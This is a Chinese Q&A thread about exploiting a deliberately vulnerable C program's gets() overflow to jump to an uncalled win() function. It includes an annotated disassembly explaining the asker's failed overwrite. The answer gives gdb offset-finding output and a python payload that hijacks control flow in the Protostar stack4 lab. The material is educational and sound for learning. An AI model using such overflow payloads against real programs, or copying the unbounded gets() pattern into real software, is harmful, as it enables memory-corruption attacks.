无法覆盖返回地址(EIP)

时间:2019-12-19 18:11:09

标签: c gdb buffer-overflow

我正在尝试利用下面这个程序中的缓冲区溢出,环境是 32 位的 Kali Linux。

#include <stdlib.h>
/* Target of the exercise: nothing in this program calls win(); the goal is to
 * reach it by overwriting main's return address.
 * NOTE(review): printf is declared in <stdio.h>, which this listing does not
 * include (only <stdlib.h>), so it presumably compiled via an implicit
 * declaration. The disassembly below shows gcc lowered this call to puts(). */
void win()
{
printf("code flow successfully changed\n");
}

/* Deliberately vulnerable entry point: gets() reads without any length bound
 * (it was removed from C11 for exactly this reason), so input longer than
 * 64 bytes runs past buffer[] into the saved registers above it.
 * Per the disassembly below, gcc places buffer at -0x48(%ebp) and the saved
 * ECX at -0x8(%ebp), i.e. at byte 64 of the overflow; saved EBP is at byte 72
 * and the copied return address at byte 76. main's epilogue rebuilds ESP from
 * that saved ECX (lea -0x4(%ecx),%esp) before ret, so the word actually popped
 * as the return address is whatever ECX-4 points to -- not the word written at
 * byte 76. Clobbering bytes 64..67 therefore makes ret itself fault. */
int main(int argc, char **argv)
{
char buffer[64];

gets(buffer);
}

我用 pattern_offset 得到覆盖 EBP 所需的偏移是 72。实际情况是:EBP 确实被覆盖了,但即使我写入 72 + 4 字节覆盖 EBP,再接上 win 的地址以覆盖返回地址,EIP 仍然没有被覆盖。

EIP: 0x40120f(即 main 的 ret 指令)

EIP 始终停在这条 ret 指令上,从未被改写成我填入的地址。

Disassembly of section .init:

00001000 <_init>:
    1000:       53                      push   %ebx
    1001:       83 ec 08                sub    $0x8,%esp
    1004:       e8 a7 00 00 00          call   10b0 <__x86.get_pc_thunk.bx>
    1009:       81 c3 f7 2f 00 00       add    $0x2ff7,%ebx
    100f:       8b 83 f4 ff ff ff       mov    -0xc(%ebx),%eax
    1015:       85 c0                   test   %eax,%eax
    1017:       74 02                   je     101b <_init+0x1b>
    1019:       ff d0                   call   *%eax
    101b:       83 c4 08                add    $0x8,%esp
    101e:       5b                      pop    %ebx
    101f:       c3                      ret    

Disassembly of section .plt:

00001020 <.plt>:
    1020:       ff b3 04 00 00 00       pushl  0x4(%ebx)
    1026:       ff a3 08 00 00 00       jmp    *0x8(%ebx)
    102c:       00 00                   add    %al,(%eax)
        ...

00001030 <gets@plt>:
    1030:       ff a3 0c 00 00 00       jmp    *0xc(%ebx)
    1036:       68 00 00 00 00          push   $0x0
    103b:       e9 e0 ff ff ff          jmp    1020 <.plt>

00001040 <puts@plt>:
    1040:       ff a3 10 00 00 00       jmp    *0x10(%ebx)
    1046:       68 08 00 00 00          push   $0x8
    104b:       e9 d0 ff ff ff          jmp    1020 <.plt>

00001050 <__libc_start_main@plt>:
    1050:       ff a3 14 00 00 00       jmp    *0x14(%ebx)
    1056:       68 10 00 00 00          push   $0x10
    105b:       e9 c0 ff ff ff          jmp    1020 <.plt>

Disassembly of section .plt.got:

00001060 <__cxa_finalize@plt>:
    1060:       ff a3 f0 ff ff ff       jmp    *-0x10(%ebx)
    1066:       66 90                   xchg   %ax,%ax

Disassembly of section .text:

00001070 <_start>:
    1070:       31 ed                   xor    %ebp,%ebp
    1072:       5e                      pop    %esi
    1073:       89 e1                   mov    %esp,%ecx
    1075:       83 e4 f0                and    $0xfffffff0,%esp
    1078:       50                      push   %eax
    1079:       54                      push   %esp
    107a:       52                      push   %edx
    107b:       e8 22 00 00 00          call   10a2 <_start+0x32>
    1080:       81 c3 80 2f 00 00       add    $0x2f80,%ebx
    1086:       8d 83 80 d2 ff ff       lea    -0x2d80(%ebx),%eax
    108c:       50                      push   %eax
    108d:       8d 83 20 d2 ff ff       lea    -0x2de0(%ebx),%eax
    1093:       50                      push   %eax
    1094:       51                      push   %ecx
    1095:       56                      push   %esi
    1096:       ff b3 f8 ff ff ff       pushl  -0x8(%ebx)
    109c:       e8 af ff ff ff          call   1050 <__libc_start_main@plt>
    10a1:       f4                      hlt    
    10a2:       8b 1c 24                mov    (%esp),%ebx
    10a5:       c3                      ret    
    10a6:       66 90                   xchg   %ax,%ax
    10a8:       66 90                   xchg   %ax,%ax
    10aa:       66 90                   xchg   %ax,%ax
    10ac:       66 90                   xchg   %ax,%ax
    10ae:       66 90                   xchg   %ax,%ax

000010b0 <__x86.get_pc_thunk.bx>:
    10b0:       8b 1c 24                mov    (%esp),%ebx
    10b3:       c3                      ret    
    10b4:       66 90                   xchg   %ax,%ax
    10b6:       66 90                   xchg   %ax,%ax
    10b8:       66 90                   xchg   %ax,%ax
    10ba:       66 90                   xchg   %ax,%ax
    10bc:       66 90                   xchg   %ax,%ax
    10be:       66 90                   xchg   %ax,%ax

000010c0 <deregister_tm_clones>:
    10c0:       e8 e0 00 00 00          call   11a5 <__x86.get_pc_thunk.dx>
    10c5:       81 c2 3b 2f 00 00       add    $0x2f3b,%edx
    10cb:       8d 8a 20 00 00 00       lea    0x20(%edx),%ecx
    10d1:       8d 82 20 00 00 00       lea    0x20(%edx),%eax
    10d7:       39 c8                   cmp    %ecx,%eax
    10d9:       74 1d                   je     10f8 <deregister_tm_clones+0x38>
    10db:       8b 82 ec ff ff ff       mov    -0x14(%edx),%eax
    10e1:       85 c0                   test   %eax,%eax
    10e3:       74 13                   je     10f8 <deregister_tm_clones+0x38>
    10e5:       55                      push   %ebp
    10e6:       89 e5                   mov    %esp,%ebp
    10e8:       83 ec 14                sub    $0x14,%esp
    10eb:       51                      push   %ecx
    10ec:       ff d0                   call   *%eax
    10ee:       83 c4 10                add    $0x10,%esp
    10f1:       c9                      leave  
    10f2:       c3                      ret    
    10f3:       8d 74 26 00             lea    0x0(%esi,%eiz,1),%esi
    10f7:       90                      nop
    10f8:       c3                      ret    
    10f9:       8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi

00001100 <register_tm_clones>:
    1100:       e8 a0 00 00 00          call   11a5 <__x86.get_pc_thunk.dx>
    1105:       81 c2 fb 2e 00 00       add    $0x2efb,%edx
    110b:       55                      push   %ebp
    110c:       89 e5                   mov    %esp,%ebp
    110e:       53                      push   %ebx
    110f:       8d 8a 20 00 00 00       lea    0x20(%edx),%ecx
    1115:       8d 82 20 00 00 00       lea    0x20(%edx),%eax
    111b:       83 ec 04                sub    $0x4,%esp
    111e:       29 c8                   sub    %ecx,%eax
    1120:       89 c3                   mov    %eax,%ebx
    1122:       c1 e8 1f                shr    $0x1f,%eax
    1125:       c1 fb 02                sar    $0x2,%ebx
    1128:       01 d8                   add    %ebx,%eax
    112a:       d1 f8                   sar    %eax
    112c:       74 14                   je     1142 <register_tm_clones+0x42>
    112e:       8b 92 fc ff ff ff       mov    -0x4(%edx),%edx
    1134:       85 d2                   test   %edx,%edx
    1136:       74 0a                   je     1142 <register_tm_clones+0x42>
    1138:       83 ec 08                sub    $0x8,%esp
    113b:       50                      push   %eax
    113c:       51                      push   %ecx
    113d:       ff d2                   call   *%edx
    113f:       83 c4 10                add    $0x10,%esp
    1142:       8b 5d fc                mov    -0x4(%ebp),%ebx
    1145:       c9                      leave  
    1146:       c3                      ret    
    1147:       8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi
    114e:       66 90                   xchg   %ax,%ax

00001150 <__do_global_dtors_aux>:
    1150:       55                      push   %ebp
    1151:       89 e5                   mov    %esp,%ebp
    1153:       53                      push   %ebx
    1154:       e8 57 ff ff ff          call   10b0 <__x86.get_pc_thunk.bx>
    1159:       81 c3 a7 2e 00 00       add    $0x2ea7,%ebx
    115f:       83 ec 04                sub    $0x4,%esp
    1162:       80 bb 20 00 00 00 00    cmpb   $0x0,0x20(%ebx)
    1169:       75 27                   jne    1192 <__do_global_dtors_aux+0x42>
    116b:       8b 83 f0 ff ff ff       mov    -0x10(%ebx),%eax
    1171:       85 c0                   test   %eax,%eax
    1173:       74 11                   je     1186 <__do_global_dtors_aux+0x36>
    1175:       83 ec 0c                sub    $0xc,%esp
    1178:       ff b3 1c 00 00 00       pushl  0x1c(%ebx)
    117e:       e8 dd fe ff ff          call   1060 <__cxa_finalize@plt>
    1183:       83 c4 10                add    $0x10,%esp
    1186:       e8 35 ff ff ff          call   10c0 <deregister_tm_clones>
    118b:       c6 83 20 00 00 00 01    movb   $0x1,0x20(%ebx)
    1192:       8b 5d fc                mov    -0x4(%ebp),%ebx
    1195:       c9                      leave  
    1196:       c3                      ret    
    1197:       8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi
    119e:       66 90                   xchg   %ax,%ax

000011a0 <frame_dummy>:
    11a0:       e9 5b ff ff ff          jmp    1100 <register_tm_clones>

000011a5 <__x86.get_pc_thunk.dx>:
    11a5:       8b 14 24                mov    (%esp),%edx
    11a8:       c3                      ret    

000011a9 <win>:                                                        # unrelocated file offset: the binary is position-independent (note the get_pc_thunk calls), so win's runtime address is load base + 0x11a9
    11a9:       55                      push   %ebp
    11aa:       89 e5                   mov    %esp,%ebp
    11ac:       53                      push   %ebx
    11ad:       83 ec 04                sub    $0x4,%esp
    11b0:       e8 5b 00 00 00          call   1210 <__x86.get_pc_thunk.ax>  # eax = address of the next insn (0x11b5 + base)
    11b5:       05 4b 2e 00 00          add    $0x2e4b,%eax                  # eax = PIC data base (presumably _GLOBAL_OFFSET_TABLE_)
    11ba:       83 ec 0c                sub    $0xc,%esp
    11bd:       8d 90 08 e0 ff ff       lea    -0x1ff8(%eax),%edx            # edx = address of the message string (from the C source: "code flow successfully changed")
    11c3:       52                      push   %edx
    11c4:       89 c3                   mov    %eax,%ebx
    11c6:       e8 75 fe ff ff          call   1040 <puts@plt>               # gcc lowered printf("...\n") to puts
    11cb:       83 c4 10                add    $0x10,%esp
    11ce:       90                      nop
    11cf:       8b 5d fc                mov    -0x4(%ebp),%ebx
    11d2:       c9                      leave  
    11d3:       c3                      ret                                  # after a hijack this pops whatever sits above win's address on the attacker-controlled stack; a SIGSEGV after the message (as in the answer's run) is the expected result

000011d4 <main>:                                                       # frame layout (from the instructions below): buffer at -0x48(%ebp), saved ecx at -0x8(%ebp), saved ebx at -0x4(%ebp), saved ebp at 0(%ebp), COPY of the return address at 4(%ebp)
    11d4:       8d 4c 24 04             lea    0x4(%esp),%ecx                # ecx = entry esp + 4 -> one word above the caller's return-address slot
    11d8:       83 e4 f0                and    $0xfffffff0,%esp              # realign the stack to 16 bytes (may leave 0..12 bytes of padding above the copied return address)
    11db:       ff 71 fc                pushl  -0x4(%ecx)                    # push a copy of the original return address onto the aligned stack
    11de:       55                      push   %ebp
    11df:       89 e5                   mov    %esp,%ebp
    11e1:       53                      push   %ebx                          # saved ebx at -0x4(%ebp)
    11e2:       51                      push   %ecx                          # saved ecx at -0x8(%ebp): the first word past the 64-byte buffer (overflow bytes 64..67)
    11e3:       83 ec 40                sub    $0x40,%esp
    11e6:       e8 25 00 00 00          call   1210 <__x86.get_pc_thunk.ax>
    11eb:       05 15 2e 00 00          add    $0x2e15,%eax
    11f0:       83 ec 0c                sub    $0xc,%esp
    11f3:       8d 55 b8                lea    -0x48(%ebp),%edx              # edx = &buffer; 0x48 = 72 bytes below the saved ebp, which is where pattern_offset's "72" comes from
    11f6:       52                      push   %edx
    11f7:       89 c3                   mov    %eax,%ebx
    11f9:       e8 32 fe ff ff          call   1030 <gets@plt>               # unbounded read into buffer -- the overflow
    11fe:       83 c4 10                add    $0x10,%esp
    1201:       b8 00 00 00 00          mov    $0x0,%eax
    1206:       8d 65 f8                lea    -0x8(%ebp),%esp
    1209:       59                      pop    %ecx                          # reloads ecx from -0x8(%ebp): overflow bytes 64..67 now control ecx
    120a:       5b                      pop    %ebx
    120b:       5d                      pop    %ebp                          # overflow bytes 72..75 land in ebp
    120c:       8d 61 fc                lea    -0x4(%ecx),%esp               # esp = ecx - 4: the ret below pops its target from wherever the (clobbered) ecx points, not from 4(%ebp)
    120f:       c3                      ret                                  # with ecx overwritten by filler, esp is garbage and this instruction itself faults -- which appears to be the EIP=0x40120f reported in the question (base 0x400000 + 0x120f); the copied return address at 4(%ebp) is never used

00001210 <__x86.get_pc_thunk.ax>:
    1210:       8b 04 24                mov    (%esp),%eax
    1213:       c3                      ret    
    1214:       66 90                   xchg   %ax,%ax
    1216:       66 90                   xchg   %ax,%ax
    1218:       66 90                   xchg   %ax,%ax
    121a:       66 90                   xchg   %ax,%ax
    121c:       66 90                   xchg   %ax,%ax
    121e:       66 90                   xchg   %ax,%ax

00001220 <__libc_csu_init>:
    1220:       55                      push   %ebp
    1221:       e8 5b 00 00 00          call   1281 <__x86.get_pc_thunk.bp>
    1226:       81 c5 da 2d 00 00       add    $0x2dda,%ebp
    122c:       57                      push   %edi
    122d:       56                      push   %esi
    122e:       53                      push   %ebx
    122f:       83 ec 0c                sub    $0xc,%esp
    1232:       89 eb                   mov    %ebp,%ebx
    1234:       8b 7c 24 28             mov    0x28(%esp),%edi
    1238:       e8 c3 fd ff ff          call   1000 <_init>
    123d:       8d 9d f8 fe ff ff       lea    -0x108(%ebp),%ebx
    1243:       8d 85 f4 fe ff ff       lea    -0x10c(%ebp),%eax
    1249:       29 c3                   sub    %eax,%ebx
    124b:       c1 fb 02                sar    $0x2,%ebx
    124e:       74 25                   je     1275 <__libc_csu_init+0x55>
    1250:       31 f6                   xor    %esi,%esi
    1252:       8d b6 00 00 00 00       lea    0x0(%esi),%esi
    1258:       83 ec 04                sub    $0x4,%esp
    125b:       57                      push   %edi
    125c:       ff 74 24 2c             pushl  0x2c(%esp)
    1260:       ff 74 24 2c             pushl  0x2c(%esp)
    1264:       ff 94 b5 f4 fe ff ff    call   *-0x10c(%ebp,%esi,4)
    126b:       83 c6 01                add    $0x1,%esi
    126e:       83 c4 10                add    $0x10,%esp
    1271:       39 f3                   cmp    %esi,%ebx
    1273:       75 e3                   jne    1258 <__libc_csu_init+0x38>
    1275:       83 c4 0c                add    $0xc,%esp
    1278:       5b                      pop    %ebx
    1279:       5e                      pop    %esi
    127a:       5f                      pop    %edi
    127b:       5d                      pop    %ebp
    127c:       c3                      ret    
    127d:       8d 76 00                lea    0x0(%esi),%esi

00001280 <__libc_csu_fini>:
    1280:       c3                      ret    

00001281 <__x86.get_pc_thunk.bp>:
    1281:       8b 2c 24                mov    (%esp),%ebp
    1284:       c3                      ret    

Disassembly of section .fini:

00001288 <_fini>:
    1288:       53                      push   %ebx
    1289:       83 ec 08                sub    $0x8,%esp
    128c:       e8 1f fe ff ff          call   10b0 <__x86.get_pc_thunk.bx>
    1291:       81 c3 6f 2d 00 00       add    $0x2d6f,%ebx
    1297:       83 c4 08                add    $0x8,%esp
    129a:       5b                      pop    %ebx
    129b:       c3                      ret    


答案 0 :(得分:0)

我猜你是想把控制流重定向到函数 win()。注意:下面的演示针对的是 Protostar 的 stack4(非 PIE,win 位于固定地址 0x080483f4,返回地址从第 77 字节开始被覆盖),与提问者的二进制(PIE,且 main 在 ret 之前用 lea -0x4(%ecx),%esp 从保存的 ECX 重建 ESP)并不相同,所以这里的偏移和地址不能直接照搬。

用 nm 查找函数 win() 的地址:

user@protostar:/opt/protostar/bin$ nm stack4 | grep win
080483f4 T win

可以看到,输入 76 个 A 时程序崩溃但 EIP 尚未被覆盖;输入 77 个 A 时 EIP 开始被覆盖。

76 A:

user@protostar:/opt/protostar/bin$ gdb -q stack4
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r
Starting program: /opt/protostar/bin/stack4 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at libc-start.c:187
187 libc-start.c: No such file or directory.
in libc-start.c
(gdb) 

77 A:

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0xb7ea0041 in ?? () from /lib/libc.so.6
(gdb)

注意崩溃地址 0xb7ea0041 的最低字节 0x41 就是 'A':第 77 个字节已经进入了 EIP 的最低字节。

解决方案:

user@protostar:/opt/protostar/bin$ python -c 'print "A"*76+"\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault
user@protostar:/opt/protostar/bin$